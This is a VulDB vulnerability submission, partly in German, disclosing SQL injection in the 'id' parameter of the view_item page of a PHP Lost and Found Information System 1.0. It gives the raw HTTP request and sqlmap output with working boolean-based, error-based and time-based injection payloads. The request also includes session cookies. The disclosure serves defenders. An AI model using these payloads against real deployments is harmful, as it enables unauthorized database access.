Submit #156022: SQL Injection in items/view_item Lost and Found Information System 1.0info

TitelSQL Injection in items/view_item Lost and Found Information System 1.0
BeschreibungSource: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html Product: Lost and Found Information System Version: 1.0 POC_IMAGE: https://github.com/tht1997/CVE_2023/blob/main/Lost%20and%20Found%20Information%20System/img/view_item.png Request vuln: GET /php-lfis/admin/?page=items/view_item&id=16 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost/php-lfis/admin/?page=items Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=cjvq90aj2a5aaq7trm1s90ps9h Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Result SQLMAP: GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y sqlmap identified the following injection point(s) with a total of 431 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=items/view_item&id=16' AND 3876=3876 AND 'GXVC'='GXVC Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=items/view_item&id=16' OR (SELECT 7792 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT (ELT(7792=7792,1))),0x71766b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nycu'='nycu Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=items/view_item&id=16' AND (SELECT 3771 FROM (SELECT(SLEEP(5)))ePGD) AND 'eaiq'='eaiq ---
Quelle⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Benutzer
 huutuanbg97 (UID 45015)
Einreichung13.05.2023 05:58 (vor 3 Jahren)
Moderieren14.05.2023 09:59 (1 day later)
StatusAkzeptiert
VulDB Eintrag228980 [SourceCodester Lost and Found Information System 1.0 GET Parameter view_item ID SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!